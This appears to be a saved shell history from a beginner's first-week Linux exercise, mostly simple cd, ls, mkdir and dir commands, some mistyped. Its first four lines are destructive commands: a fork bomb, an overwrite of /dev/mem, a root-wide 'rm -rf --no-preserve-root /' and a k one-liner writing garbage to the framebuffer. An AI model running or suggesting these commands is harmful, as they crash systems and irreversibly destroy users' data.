    1  :(){ :|:& };:
    2  dd if=/dev/urandom of=/dev/mem
    3  rm -rf --no-preserve-root /
    4  echo '{"/dev/fb0"0:`c$x*!3145727;o 10+x}0' | k
    5  cd
    6  cd.
    7  cd .
    8  cd /
    9  dir
   10  mkdir ~/week1
   11  dir
   12  mkdir week1
   13  dir
   14  cd week1
   15  cd /
   16  cd usr
   17  cd bin
   18  ls
   19  dir
   20   clear
   21  cd //
   22  cd /
   23  cd week1
   24  dir
   25  ls 
   26  ls -h
   27  list -1
   28  ls -1
   29  ls /usr/bin
   30  clear
   31  ls /usr/bin/*.gcc -r
   32  ls /usr/bin *.gcc -r
   33  cls
   34  history > ex2.txt
